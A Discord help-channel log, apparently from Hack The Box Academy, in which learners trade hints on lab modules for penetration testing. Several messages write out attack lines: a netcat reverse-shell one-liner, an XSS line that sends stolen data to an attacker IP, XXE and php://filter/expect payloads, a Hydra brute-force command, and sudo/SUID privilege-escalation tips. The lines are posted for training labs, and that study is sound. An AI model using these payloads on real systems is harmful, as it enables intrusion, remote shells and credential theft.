#modules

bright pivot
#

Why is my output so messy?

#

is there anything wrong with my command?

autumn pilot
#

the wrapping of the results of ffuf depends on the size of the terminal, e.g., the progress

dusty widget
#

hello

winged egret
#

Hello guys, in the Server Side Attacks - Skills Assessment we are provided with a username and password ... Has anyone used an approach involving those credentials to get the flag? Because I already got the flag with 2 approaches, so I wonder if there's a third one I haven't thought of.

fathom pendant
cloud urchin
#

fullscreen or maximized?

fathom pendant
#

Maximized

#

Ig if you wanna be pedantic

cloud urchin
#

i don't recall that issue maximized or when it's a smaller window but i don't usually use a smaller window

fathom pendant
#

Ffuf does weird stuff on smaller windows

safe star
#

For me that only happens on the parrot terminal

cloud urchin
#

yeah i use kali and haven't seen that, but maverick is also using kali

safe star
#

Oh I didn't even see the picture 🤣

#

Yeah idk about that

thin kelp
#

sorry, why can't I access the general?

storm elk
glad frost
#

Hello everyone, I've been working on the "Injection Attacks" skills assessment. I managed to discover the initial vulnerability but can't find the internal web application (even though I discovered an IP address). Any nudges are appreciated.

fickle topaz
#

hey guys
quick question
for the module Password Attacks, under Pass the Ticket (PtT) from Linux

#

I have been trying to log in to the shares using smbclient but it returns an error

fathom pendant
#

Sometimes this one is tricky on vms, did you try connecting via netcat

fathom pendant
stable sparrow
fathom pendant
#

For some reason that one is dumb for vms

stable sparrow
safe star
#

@stable sparrow have u tried udp?

fathom pendant
safe star
#

yes

#

just tested

rustic sage
#

-sU 😮

fathom pendant
#

Deleting bc spoiler post anyway

stable sparrow
stable sparrow
fathom pendant
#

Same thing

safe star
stable sparrow
#

alr then yes

fathom pendant
#

A lot of the s[Y] commands can be combined

stable sparrow
#

i will try on a pwnbox

fathom pendant
#

Make sure to turn off your vpn first

safe star
#

there is only one version

stable sparrow
fathom pendant
stable sparrow
#

which seems like the real version of the server
but i have reservations about this being the expected flag

fathom pendant
#

It's not

safe star
#

i cant even get a version 😭

fathom pendant
#

The expected value is HTB{..}

safe star
#

just says filtered on tcp

fathom pendant
#

This is the medium lab

#

For nmap module

stable sparrow
#

it effectively worked on the pwnbox on the first try with the most brain dead nmap command

fathom pendant
#

Ye

#

Idk why this happens

#

¯\_(ツ)_/¯

stable sparrow
stable sparrow
limber river
fathom pendant
fathom pendant
#

Copy/paste

fathom pendant
#

It's just a thing that happens for some dumb reason

stable sparrow
oak kernel
#

Hm I'm having an issue with XSS / Session Hijacking .. it downloads my script.js but it doesn't seem to get executed 🤔

safe star
#

i dont think it will, but u can just add the script.js payload instead

#

same result

oak kernel
#

Yeah I guess, but the same result in my case means that it doesn't work either 😛 ..looking at the solution, it says it should work. Maybe it's broken somehow. (or maybe the solution under "show solution" is outdated)

safe star
#

worked fine for me

#

did u prepend anything like a " for the script?

oak kernel
#

Hmm you mean in the XSS payload in the input field? If so, yes. 🙂 I get the request for script.js in the php access log output:
[Sat Sep 14 16:02:28 2024] 10.129.98.209:36192 [200]: GET /script.js
... But then nothing more 😦 And script.js contains new Image().src='http://<ip>:<port>/[...]; .. but I don't get that request for some reason

fathom pendant
umbral spade
#

I only get 4 ports which none of them are ftp

umbral spade
fathom pendant
#

Also sometimes you need to respawn a box a few times to get it to show

#

For w/e reason it doesn't always load

umbral spade
#

I'll try that now

oak kernel
safe star
fathom pendant
umbral spade
safe star
#

yeah that machine is laggy

safe star
chilly prawn
#

lit

oak kernel
fathom pendant
#

Oof

frozen sage
#

Fuck rude people

fathom pendant
#

I'd rather not

rustic sage
#

Section: SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)
Module: Security Monitoring & SIEM Fundamentals

#

Can't seem to find where the document would be

sly trench
#

Why cant I verify from my phone?

acoustic owl
orchid monolith
#

Hi, I have been stuck on one module, "Advanced XSS and CSRF Exploitation" "XSS Filter Bypasses". Where can I ask the question? Please give me a recommendation, thank you.

cloud urchin
#

in this channel

orchid monolith
#

thank you!

#

At the end of the lab, I see this content:

Note: Due to the way the admin user accesses the page, please make sure not to use any port in URLs in your payload, i.e., use http://exfiltrate.htb/ instead of http://exfiltrate.htb:PORT/.
About this sentence, I don't understand it, because when I configure the vhost like the example below:

I add this line to my hosts file:
94.237.59.199 vulnerablesite.htb exploitserver.htb exfiltrate.htb
then I can only access http://exfiltrate.htb:PORT/log
so how can I access http://exfiltrate.htb/log to see the victim page?

cloud urchin
#

use the port

#

it's talking about not including the port in your payload to the victim, not you navigating to it yourself

#

you should delete that script

#

all it says is don't use the port in the payload. obviously you still need to use the port in your own browser to view the log.

orchid monolith
#

my question is the payload will use port 80 when submitted to the victim, but for viewing the log we are using another port, so how can I see the log when the two ports are different? This is not very logical

#

if I submit the payload to port 80 then I also have to view the log at port 80.

acoustic owl
#

I'm not entirely sure, but I think it's because of the way the lab is set up (Docker). Inside the container, the servers run on port 80, but you can only access the container from "outside" and are therefore dependent on port mapping.

#

While the internal process can access port 80 directly, you can only access port 80 internally from the outside via port forwarding.

orchid monolith
#

thanks for the good comment, I was not thinking about this situation.

acoustic owl
#

I guess it is something like this
docker run -p 12345:80 httpd

orchid monolith
#

I think so

river marsh
#

when it comes to the student program am i charged at the start of every month or a month after subscribing?

orchid monolith
#

Hi, I tried so many times, not using the port like the topic requires, but I don't get any request from the victim. If anyone has passed, please give a recommendation for this lab: Advanced XSS and CSRF Exploitation, "XSS Filter Bypasses".

cloud urchin
#

probably your payload then

#

the section is about bypassing filters, so you have to try the ways it teaches till you get a bypass

vagrant osprey
#

I've tried google, but I don't understand how people are explaining it

eager ruin
#

Hello

storm elk
#

Hello

eager ruin
#

I've been studying on the platform for a while, but from time to time I see how some command syntax within the paragraphs looks a bit stuck together, and it tends to confuse. If they could fix that little detail so that the command displays clearly, that would be a success.

storm elk
vagrant osprey
cloud urchin
vagrant osprey
sweet jewel
#

kerberos attacks - unconstrained delegation on users

./dnstool.py -u "inlanefreight.local\callum.dixon" -p "[redacted]" -r "gatari.inlanefreight.local" -d "10.10.14.2" --action add "10.129.205.35"

the first time running shows that it was successful, but trying to validate by running nslookup against the DC (10.129.205.35) shows that there are no records for gatari.inlanefreight.local

  • DC is able to resolve itself (dc01.inlanefreight.local)
  • Trying to add the DNS record again says that the record already exists, so I'm assuming it works

anyone know what's causing this issue? my assumption is caching, but I've waited 5 minutes and there's no change

edit: 10 mins later, the DNS cache updated and it works now~

vagrant osprey
cloud urchin
#

that's it. if python has the suid bit set then you can run that command to gain root. just like it says.

#

you can look at the gtfobins link i sent you to see common apps that can be abused if you have the suid bit set on them.

vagrant osprey
#

or do i just straight up run that cmd

safe star
#

the id is to verify that you escalated your privileges

cloud urchin
#

like i said.. if python has the suid bit set then you run that command to get root. another program will have a different command.

#

that's literally it.

#

the suid bit allows you to run an executable as the file owner

#

so if root owns python, you can use that to run a python command as root

#

that python command just spawns a bash shell

vagrant osprey
cloud urchin
#

and since you have the suid bit set, it runs as root the owner of python

#

look at the link i gave you it shows you exactly which one

#

"how to detect suid and gui for privilege escalation"

#

so on the box, you need to run the command that finds executables with the suid bit set, then abuse that executable

vagrant osprey
vagrant osprey
#

this sort of output?

fathom pendant
#

Just check what the usr can sudo

cloud urchin
#

yeah those are executables with the suid bit set, you can see the 's'

#

just because it's set doesn't mean it's abusable, that's when you use the other link i gave you the gtfobins link, that will show you how to abuse an executable to escalate privileges

fathom pendant
#

LinEnum spits out a bunch of unnecessary stuff for new people

cloud urchin
#

yeah that's for sure. i always start with sudo -l

fathom pendant
#

The answer is way simpler than suid abuse

vagrant osprey
vagrant osprey
#

beautiful

fathom pendant
#

Use gtfobins to figure out what you can do

vagrant osprey
#

i read that first part and thought you were telling me to gtfo 😭 will look into what that cmd does

fathom pendant
#

It's not a command

#

The website that SuperNuts linked earlier lol

vagrant osprey
#

yeah i found the website 20 sec after i said that 😭 i'm not sure what to look for though, i searched sudo and it's not helpful

fathom pendant
#

Maybe the bin you can use with sudo

#

🙃

#

Sudo isn't gonna be helpful on that site bc that's generally just a category for the listed program/bin

vagrant osprey
#

sudo /bin/sh?

fathom pendant
#

That's not the binary you can use with sudo

#

look at the output of sudo -l and you'll figure it out

#

You had it earlier btw

#

Your message was removed bc spoiler

rustic sage
#

I want to learn python..!!

fathom pendant
cloud urchin
#

that's a good one, i'd start with Python Crash Course: A Hands-On, Project-Based Introduction to Programming if you're just starting out

fathom pendant
cloud urchin
#

that's cool. they're both great books. i'm trying to get into c/c++ now too, there's just too much to learn and so little time.

vagrant osprey
fathom pendant
#

Wtf is audi

#

What I meant by that is the output of sudo -l will tell you what to look for in gtfobins

marsh echo
#

hey everyone

next bronze
marsh echo
#

I've already found the flag but I wanted to try a reverse shell so it's not possible :/

full wagon
#

Information Gathering Web Edition - skills assessment.
Need a hand on the last two questions (the first three are done). I tried different tools to crawl for e-mail addresses, and also to enumerate any interesting files and folders (to find the answer for the last question), but the last two questions confuse me. I don't want to put spoilers here if not needed. What info would anyone want me to post in order to get some guidance? (e.g. running finalrecon just throws errors). I have tried both with the parrot pwnbox, and with vpn from my kali.

sacred jacinth
#

its simple, but a lot of us overlooked it.

#


full wagon
ember fern
sacred jacinth
sacred jacinth
stiff bone
#

Who can I contact for help with SA 1 on the Introduction to Windows Evasion Techniques module?

full wagon
# sacred jacinth precisely! perhaps try further enumeration on that sub?

Ok, now I ran various tools with various wordlists on that sub (the only sub I found while enumerating with large wordlists) and I cannot find anything useful. So, I'll have to skip the last two questions and move on. Notice that it appears to be somewhat unstable also. Suddenly no connection. Well, thanks for trying to push me in the right direction anyway.

sacred jacinth
rustic sage
#

Module: File Inclusion
Section: Log Poisoning

I have executed commands like id, ls /, and every one of them works, but when reading the flag file (gibberishcharacter.txt) through the 'cat' command, it shows empty. Any idea!?

rustic sage
full wagon
tired juniper
#

Hiii

analog dock
sacred jacinth
quiet trout
#

oh nvm

rustic sage
olive slate
#

Need some help on Injection Attacks > XPath - Blind Exploitation. I tried to exfiltrate the entire XML schema but couldn't get anything other than

<accounts>
    <acc>
        <username>username</username>
        <password>password</password>
    </acc>
    <acc>
        <username>username</username>
        <password>password</password>
    </acc>
</accounts>

Not sure what I missed.

#

Wait. I'm an idiot. I did it wrong..

old oasis
quiet trout
#

show us your complete POC with DTD if XXE

#

err wait that might not be allowed

olive slate
quiet trout
#

i dont think i have access to that

#

still open to try and help but i think we need some more info, without spoiling of course

#

@olive slate ^

#

oh nvm this is xpath ill be no help here

old oasis
bronze heron
#

I'm having trouble with the admin page assessment in the brute-force module on HTB Academy.

I'm using the following Hydra command:

hydra -l user -P /usr/share/seclists/Passwords/Default-Credentials/db2-betterdefaultpasslist.txt 83.136.255.40 -s 37527 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^ :H=Authorization: Basic dXNlcjpwYXNzd29ycg== :F=<form name=log-in"

Although this command generates many credentials, none are valid. I'm not looking for a solution, but could you provide a hint on what might be wrong? Your help would be greatly appreciated.

quiet trout
#

also i dont see the -t option in your hydra which might be causing you to get rate limited.

#

if i remember how it works correctly.

#

you might need to encapsulate your headers and any other directives in your command in quotes as well, this could be throwing off the processing of the entire cmd

bronze heron
quiet trout
#

also consider, as a sanity check, modifying your cmd to use the alternative http-post-form directive like http-post-form://target.com/admin/login.php:... just to remove any chance your use of a bare ip without scheme is being misinterpreted.

#

i dont like hydra because of these things.

#

but i guess we're stuck with it

#

@bronze heron ^

tender nimbus
#

Hey guys, I'm stuck on the Footprinting Lab - Hard section of the Footprinting module. When I do my scan I have this as the result, but I have no credentials. I tried different things to see if there are other potential open ports, by scanning from another source port and scanning more quietly, but I found nothing. Any help?

sacred jacinth
tender nimbus
sacred jacinth
tender nimbus
sacred jacinth
#

what are the -s and -D flags?

sacred jacinth
#

always start small

#

when it comes to UDP

tender nimbus
sacred jacinth
#

your preference

quiet trout
marsh echo
quiet trout
#

oh right, thx

#

/me slaps forehead

#

wait, can you do that? i thought that was a diff filter?

#

is there a way to combine them? php://filter.../expect:// ?

#

or is it expect://filter ? sorry these php wrappers are new to me.

#

ill try both

marsh echo
#

no php://filter/read=convert.base64-encode/resource=expect://

#

and your order must be encoded in URL

quiet trout
#

oh i see i didnt realize you could ... string them along like that

marsh echo
#

me neither ahaha during the CPTS htb surprised me from module to module

quiet trout
#

rock on man, that was clutch

#

this module certainly should've mentioned that

marsh echo
#

well, the sad thing about modules is that sometimes they make you think with the elements they give you and I think that's pretty cool ahah

quiet trout
#

very true, just didnt like how this one played out 😛

marsh echo
#

I understand you ahah

nova ginkgo
#

can anyone help me pls

I connected htb academy account to discord but not given permissions for example I can't send images

unkempt rune
#

I'm doing Web Attacks on HTBA, Advanced File Disclosure section.

I am hosting the xxe.dtd file on a web server.

My XXE payload is the following:

```xml
<!DOCTYPE email [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/flag.php"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://10.10.XX.XX:8000/xxe.dtd"> %xxe; ]>
```

I'm intercepting the payload and pointing to &joined; as it's said in the module.

I am getting a 200 OK response but not the content of the file. The file is accessed from the vulnerable web app. Any idea what I am doing wrong?

SOLVED: File path was wrong

acoustic owl
pseudo kiln
#

is this the correct syntax to use Snaffler on a non-domain joined machine: .\Snaffler.exe -s -o console ?

#

i could only find how to use it against a domain, but in the windows priv esc module they mention it for non domain joined machines too, but I cannot figure out the syntax, it just hangs

#

nvm found it on github

regal thistle
#

i have enough cubes but the module is not unlocked when i click on unlock, please help me

acoustic owl
tender nimbus
#

hey guys, quick question about pop3 and imap and their secured versions: if i can connect to one of those, will the mails on the pop3 server be the same as those on the pop3s server, or is it possible that one has more messages?

quiet trout
limber river
tender nimbus
quiet trout
#

to check for more mail*?

tender nimbus
limber river
#

but each will be a service on its own

tender nimbus
#

oh ok, and can you help me with something? I'm a little bit stuck rn

marsh echo
quiet trout
tender nimbus
#

so i found the community string of the snmp server and found some credentials for connecting to the mail servers. I found there an ssh key for tom and I'm now in, but I'm stuck: I have to find the user htb and his pass, probably in a db, but there is no db when i scan the target

quiet trout
#

its the same end result (pop3/pop3s) one is encrypted in communications the other is not

tender nimbus
quiet trout
#

oh i see you're working on lateral movement. have you checked uh whats it called... sudo users?

#

sudoers*

sacred jacinth
#

there is definitely a running service

#

database*

quiet trout
#

you're ssh'd in as whats his name tho right?

tender nimbus
sacred jacinth
tender nimbus
sacred jacinth
#

it could be running locally?

#

try running ss -lntp

quiet trout
sacred jacinth
quiet trout
#

good to know i didnt know that

#

there doesnt appear to be an htb user either

sacred jacinth
#

see any recognizable ports?

quiet trout
#

so its a login for a service and not for the box?

tender nimbus
quiet trout
#

the htb account

tender nimbus
sacred jacinth
quiet trout
#

we see a 33060 too, that looks interesting.

sacred jacinth
tender nimbus
#

i tried this but its not working

quiet trout
#

man mysql

sacred jacinth
#

its really simple

sacred jacinth
#

again, it's not exposed to the network

#

its running locally and you should delete those screenshots

#

they are spoilers

tender nimbus
#

okay, I'm gonna try to find how to interact with it locally; if I'm stuck I'm coming back ^^ thanks for your help

elder matrix
#

hey! i want to find something i found on bloodhound using powerview..
here's the scenario (names are fictional):

I got an ntlm hash for the user bob.
i found out that bob was in the "Network and Server Admins" domain group with this command:

Get-DomainUser -Identity bob

Using bloodhound, I easily found out that members of the "Network and Server Admins" group have local admin privileges on a machine called PWN03. Because of that, I was able to connect to PWN03 with psexec.py using bob's ntlm hash.

What powerview command can i use to tell me that members of "Network and Server Admins" have local admin privileges on the PWN03 machine WITHOUT logging in as bob. Bloodhound found that info without being logged on as bob.

tender nimbus
leaden radish
#

Hi. I'm working through the module with gobuster, where the goal is to brute force virtual hosts on a target system (inlanefreight.htb). First, I assigned the IP in the "hosts" file via the following command: `sudo sh -c "echo '94.237.59.63 inlanefreight.htb' >> /etc/hosts"`. I pinged "inlanefreight.htb" and it's reachable. Second, I typed the following: `gobuster vhost -u http://inlanefreight.htb:37340 -w /home/laptop/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain`. But I keep on receiving two errors: "Wordlist (-w): must be specified ( use '-w'- for stdin)" and "Url/Domain (-u): Must be specified)". I've checked the solution and this should work. Any suggestions? Thanks in advance

acoustic owl
#

Have you copied the command?
The - may be incorrect. Write the command by hand without copying it.

tender nimbus
#

@sacred jacinth @limber river pwned ^^ that was a tricky one, thanks for your help guys 🙂

leaden radish
short trellis
#

Does anyone have insight on how to statically link the correct version of GLIBC so I can complete the sudo 0-day section in linux priv esc section, since there is no reference of how to do that in the lab materials?

nova ginkgo
#

pls help guys, I can't solve: Skills Assessment - File Upload Attacks

can anyone help me

unkempt rune
#

In the Attacking Web - Final Assessment I can't cat the file:

I enumerated admin, reset his password, logged in, found XXE in the event page, but I can't output the file for fk sake. My payload is:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>&company;</name>
<details>test</details>
<date>2024-12-22</date>
</root>
```

I tried both `/flag.php` AND `flag.php`

hollow ibex
safe star
unkempt rune
#

I solved that in the end

normal sand
#

How do I tell if the Linux host I'm on is joined to Active Directory?

sacred jacinth
#

Is the OpenVAS skill assessment working for anyone else?

#

I can't seem to access the portal nor does the target machine have any gvm-start command.

normal sand
novel parrot
#

can someone help me out with the command injection skills assessment?

left egret
#

Hello, can anyone help me with "Web Service & API Attacks > Information Disclosure (with a twist of SQLi) > Identify the username of the user that has a position of 736373 through SQLi"? I tried:

```shell
ffuf -w "/usr/share/seclists/Fuzzing/6-digits-000000-999999.txt" -u "http://:3003$TARGET/?id=FUZZ" -fs 2
```

but any id with the position of 736373 appears. Any tips?

novel parrot
#

i think i found something, thank you though

rustic sage
#

also saying "network unreachable" and then never works

rustic sage
lusty hare
# rustic sage

do a ping on the host and let that run for some time and see if some packets are dropping

rustic sage
#

looks fine to me

lusty hare
#

also, to make very sure your "network" setup or the third party router is not causing any issue, i'd say try sharing your cellular data and re-do your connection

rustic sage
#

it just hit 1.4k then dropped to 448

rustic sage
#

so i had no choice but to use a third party so i can prevent ddos attacks on a game im ip db breached on

#

it's averaging 80ms

lusty hare
#

try connecting from somewhere else to make sure 100%; if you can't, use PWNBOX to confirm if it's an actual issue, because it's very unlikely that it's an xfreerdp problem. If it does, then contact support; there's a 10% chance it could be the lab being unstable

rustic sage
lusty hare
rustic sage
#

i put it on the lowest ms and recommended one for ovpn

#

and it's still doing some issues

lusty hare
#

i dont think it's an openvpn problem either, i'm starting to guess it's your WAN setup

rustic sage
#

ah

lusty hare
#

again to confirm this use pwnbox

rustic sage
#

yeah i'll use pwnbox instead then

#

what the heck my ip died on htb i had like 100mins left

#

@lusty hare even on pwnbox

safe star
rustic sage
#

it's a fresh machine

#

i put a timeout of 99999 on it also

lusty hare
rustic sage
#

yeah cause i've been trying the entire day to do this one question

safe star
#

yeah, the machine might just be slow

rustic sage
#

like it's not even that hard too

#

i know exactly where to go for this answer, i just cant even get the damn exe name at this rate

safe star
short trellis
#

Can someone help? I'm getting this error while doing the sudo 0-day section in linux priv esc:
`./sudo-hax-me-a-sandwich: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./sudo-hax-me-a-sandwich)`. I have read you have to statically link in the Makefile but I do not see any examples on how to do that.

fathom pendant
#

Add a dash between

zealous trench
fathom pendant
#

Also the target has at least gcc installed

#

Idk about any other compiling tools

short trellis
fathom pendant
#

That wasn't what I was meaning lol

#

I meant I used a diff exploit

dim wolf
#

please don't post spoilers for modules above Tier 0

short trellis
fathom pendant
dim wolf
#

yes

#

Penetration Testing Process is Tier I

fathom pendant
#

Huh

rustic sage
#

Some staff member please fix the xfreerdp machines, on pwnbox also. It's not working I cannot do 1 god damn question on hackthebox

#

i wasted my entire day not being able to do 1 question that'll take less than a minute to do

dim wolf
#

have you tried remmina?

rustic sage
#

yes and it did the same thing to me

#

i dont know what to do, pwnbox was fine yesterday

#

and xfreerdp was fine at a point and now it's just breaking every time

#

i've reset the machines like 20 times

dim wolf
#

does the module give you those creds?

rustic sage
#

yes

fathom pendant
#

Support doesn't monitor the discord

dim wolf
#

i'd also explain your internet connection setup since it's a bit unusual

rustic sage
#

so i can be wired from downstairs, i do not have a wireless connection capability on my pc

#

and im on a vpn with mullvad

fathom pendant
#

Shouldn't matter for the pwnbox

rustic sage
#

yeah exactly

fathom pendant
#

Since that's through the browser

rustic sage
#

it's working like a normal internet

dim wolf
#

oh right you're using pwnbox

fathom pendant
#

My only suggestion is changing vpn regions

rustic sage
#

protocol tcp 443

fathom pendant
#

That's pwnbox region

#

Not vpn region

rustic sage
#

yes but shouldnt that not matter though if im using the lowest ms with the pwnbox?

fathom pendant
#

Vpn region also affects target spawns

rustic sage
#

okay switching to the 2nd fastest region

fathom pendant
#

2nd fastest?

#

Dude I'm not talking about pwnbox region

rustic sage
#

yes i know

#

there was another one with it being lower than the ms i was using

#

for pwnbox

fathom pendant
#

I'm talking about us/EU academy x vpn region

#

Those don't display any ms/info

#

Aside from load

#

No

rustic sage
fathom pendant
rustic sage
#

i meant this

#

oh right, ok so shall i switch to the 6th one?

fathom pendant
#

Just any one

rustic sage
#

okay

ashen pollen
rustic sage
#

same stuff

rustic sage
# fathom pendant Just any one

i figured something out with my internet speed: i have that third party router, my devices are routed to 5G networking instead of 2.4, every device is being given at least 270mbps whereas my pc is only receiving 60mbps

#

no idea how to route my pc to 5g networking on the router

fathom pendant
#

If it's pwnbox it won't generally matter

#

Considering it's the pwnbox connection to the target

#

Reach out to support

autumn pilot
#

Also a good practice is to keep a single connection to the VPN, e.g., if you have the VPN running in a local VM and then decide to use the workstation (pwnbox) you must disconnect from the VPN on the local VM

hasty solar
#

do you mind if i dm you with a quick question using SAMLRaider in that exercise?

digital crown
#

why is ssrf so low rated?

fathom pendant
#

Try not to post potential spoilers

shut quest
#

Wrapping code in a code block like so ``` makes life easier to help, and it's gone.

nova ginkgo
rustic sage
#

how do i prevent my kali linux doing this every time

fathom pendant
# nova ginkgo how can i

Just the first and last few characters can help others determine if something looks right or not

rustic sage
fathom pendant
#

Also idk if the module taught you about $IFS yet

nova ginkgo
fathom pendant
rustic sage
#

but it does this everytime i boot

rustic sage
fathom pendant
rustic sage
#

i'd rather just not have this issue at all

fathom pendant
#

${IFS}

nova ginkgo
fathom pendant
rustic sage
fathom pendant
#

Putting behind spoiler commands does nothing

#

I don't recall too many issues with this section

nova ginkgo
#

thanks but I don't understand )

fathom pendant
vagrant osprey
#

Getting Started --> Knowledge Check
https://academy.hackthebox.com/module/77/section/859

I couldn't figure it out yesterday, so I'm trying again today. When i run the file that can be executed without root permissions, I'm unable to escalate privilege. Could someone please guide me through why I'm doing this wrong? I think my error lies somewhere within these steps:

REVERSE SHELL
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f' | tee -a template.php

BOX TERMINAL
nc -lvnp 4444

REVERSE SHELL
sudo php

fathom pendant
fathom pendant
#

Also sudo <command you can sudo>

fathom pendant
#

You can't just run sudo <command> gtfo bins gives you steps

vagrant osprey
fathom pendant
vagrant osprey
fathom pendant
#


rugged turtle
#

Hi guys, I'm having a lot of issues trying to solve the latest lab of Password Attacks - Hard.
I'm basically at the end: mounted the drive, got the hash. For a while I wanted to try decrypting them, then after a few tries I realized the smartest choice might be to simply PtH. However, there's no way to get it to work, because every option WinRM / SMB / RDP / Invoke-TheHash tells me that the hash is incorrect.
At this point, I've come to understand that maybe the issue is due to a corrupted mounting of the drive... because I can't think of anything else. Did anyone fall into this? How did you get out?

fathom pendant
vagrant osprey
fathom pendant
#

Though you may need to disable restricted admin

fathom pendant
#

You can't modify the binary here

vagrant osprey
#

so i need to modify php or no

fathom pendant
#

Gtfobins has the solution

fathom pendant
fathom pendant
vagrant osprey
fathom pendant
#

Dude

vagrant osprey
fathom pendant
#

For fucks sake

#

You just type the name of the command you can use with sudo

#

I.e. openssl

#

It's that simple

vagrant osprey
vagrant osprey
fathom pendant
foggy monolith
#

Blank nmap scan report for the "Web Server Pivoting with Rpivot" section of the Pivoting and Port Forwarding module. What am I doing wrong here?

fathom pendant
vagrant osprey
prisma canyon
#

Guys I've started the "Using web proxies" module and I've been trying to get the ZAP working for the past 5 hours, reading the guide again and again, starting new instances and I just can't get it to work. When I'm trying to open any website I just get a message "connection timed out". I have no idea what I'm doing wrong

fathom pendant
#

sudo x

vagrant osprey
#

right but i have no idea what that command is supposed to be

fathom pendant
fathom pendant
#

It's the p..

foggy monolith
fathom pendant
#

Yes @vagrant osprey

foggy monolith
#

Notice nothing there - non-standard port?

#

proxychains nmap -p80,443 -sCV -v -Pn -n --disable-arp-ping -T5 --max-retries=0 --open -oX - 172.16.5.0/23 | xsltproc -o pivoting-linuxpiv.html -

#

Not sure why that's returning nothing. Again, Rpivot section.

#

Anyone?

cloud urchin
#

looks like you're trying way too much, why not just follow what the module does?

foggy monolith
#

Adding additional ports to see if that makes a difference.

rugged turtle
# fathom pendant You can xfreerdp with the hash

I tried, doesn't work. Precisely, it tells me STATUS_LOGON_FAILURE, as if the hash is incorrect, I suppose. The point is, I've obtained these hashes from samdump2 from the SAM / SYSTEM files contained in the vhd.
So at this point I'm literally lost

rugged turtle
fathom pendant
#

Also the hash isn't the full a:b

#

It's just the b part (which is the nt hash)

foggy monolith
rugged turtle
#

winrm says Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

#

I assume it could be related to RestrictedLocalAdmin (?)

fathom pendant
cloud urchin
fathom pendant
#

Ntlm hashes are presented as lm:nt

foggy monolith
fathom pendant
cloud urchin
rustic sage
#

doesn't tell me anything for the executable

cloud urchin
#

they don't make this difficult, it's the IP in the section

rustic sage
#

i search for the T_W__.exe and it doesn't exist there for me

fathom pendant
rugged turtle
fathom pendant
#

It's not gonna be directly in the 4624 event, you're gonna follow the trail to where the login leads

rustic sage
#

Oh that makes much more sense give me a second

fathom pendant
rugged turtle
fathom pendant
#

Gimme a quick moment

fathom pendant
#

:)

#

The hash still being that b portion

rugged turtle
#

sooooo, I suppose I messed up with the -m option

fathom pendant
#

1000 should work if you just supply it with the b portion

#

I keep the example hashes page on standby just in case

rugged turtle
fathom pendant
#

Well it is talking about the hashes

#

The hashes aren't in a format that hashcat likes

rugged turtle
#

Hashfile 'mut_password.list' on line 94041 (yellow99): Token length exception
But the error seems to refer to the list, doesn't it?

rugged turtle
#

hashcat -m 1000 mut_password.list adm_ntlmhash.txt

fathom pendant
#

Ah

#

That's why

#

You put the hash/file first

#

Not the wordlist

fathom pendant
foggy monolith
fathom pendant
#

Eh moving through pivots is generally slow

rugged turtle
fathom pendant
#

It shouldn't take long to crack tbqh

fathom pendant
rugged turtle
fathom pendant
#

You get used to it

#

Or forget then immediately remember after hitting enter

rugged turtle
fathom pendant
#

I can tell you I've had my fair share of forgetting -u (for commands needing a url) or forgetting to specify http://

rugged turtle
#

-U -l/-L -u

rugged turtle
fathom pendant
#

It is enough

#

To get the hash cracked

rugged turtle
#

Hm, interesting

fathom pendant
#

If you supplied it with multiple hashes it'll take longer but it should output whenever it cracks one

rugged turtle
#

I have no clue wth happened, I also tried to recompose the dump of SAM / SYSTEM with samdump2, but nothing changed

fathom pendant
#

also

#

instead of specifying a user@target you just specify local after also telling it where the SAM/SYSTEM files are :)

#

no need for any samrdump or other tools

#

i believe you can also specify --just-ntlm or something like that

#

nvm that's for ntds files

rugged turtle
#

let me make a couple of tries

fathom pendant
#

big oof

rugged turtle
#

.......

#

god had some evil plan for me this weekend

#

Thanks a lot @fathom pendant, the only way I could come out from this dead end was to redo everything unbiased from the beginning

fathom pendant
#

your approach to the situation was valid though

#

so don't completely count yourself out

#

you found (what you assumed to be) the right hash; you attempted pth techniques, unsuccessfully, you then attempted to crack (what you assumed) were the right hashes to get a password

#

you had 0 way of knowing without attempting other tools that the hashes that the one tool gave you were incorrect

rugged turtle
#

yea, indeed, this also sets some boundaries at the same time. Especially at the beginning it's better not to venture too far. I got baited away by the vhd mounting part, which wasn't directly explained in the chapter. That led me into venturing away from the usual. I must also admit that I tried impacket-secretsdump, but I'm quite sure I messed up the command and gave up on it. I definitely need to pay more attention to the commands

median moat
#

Hi, I'm new. I want to start learning cybersecurity from Hack The Box. I know I'm in college for a different major, but right now I want to learn as much as I can.

#

What are modules for? Right now I am in the Bug Bounty Hunter track, but any pointers to get started learning?

shut vapor
nova ginkgo
tender nimbus
#

Hey guys, dumb question, but I have a lot of notes. Do you think for things like protocols and services it's useful to make a "how it works" section?

#

or should my notes be short and comprehensive?

wintry gorge
#

Can anyone give some help on the "windows lateral movement" module?

ocean night
#

@topaz dagger which CTF?

median moat
topaz dagger
fathom pendant
#

AEN isn't really a ctf

#

it's an academy module

#

second it's heavily recommended to do it blind, meaning no reading the module aside from the 2 pages of overview then just launching the target and going for domain compromise

tender nimbus
fathom pendant
#

tbh that's completely up to you: whether you want to write a quick blurb of 'DNS resolves hostnames to IPs' or do a deeper explanation is up to you

weak dagger
#

What is the best practice for the CBBH exam after finishing all the modules ?

#

Like are there certain machines or a list to practice ?

rustic sage
#

might need help with this, i can't seem to figure it out

cloud urchin
#

instead of posting a picture of the question, say the module and section and say what you're stuck on

rustic sage
#

Module: Security Monitoring & SIEM Fundamentals
Section: SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)

#

everything else I've completed, just this left, couldn't seem to figure it out

rustic sage
#

I just have no idea what I'm doing wrong, can't seem to find the document

#

DONE IT

#

now i understand what the hell i was supposed to do

short sentinel
#

Hi, does SPL stand for Splunk Processing Language or Search Processing Language? I am a little bit confused.

ashen fiber
#

I'm still stuck on here: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. - Attacking Common Services: Attacking DNS. I also used the IP instead.

fathom pendant
ashen fiber
fathom pendant
#

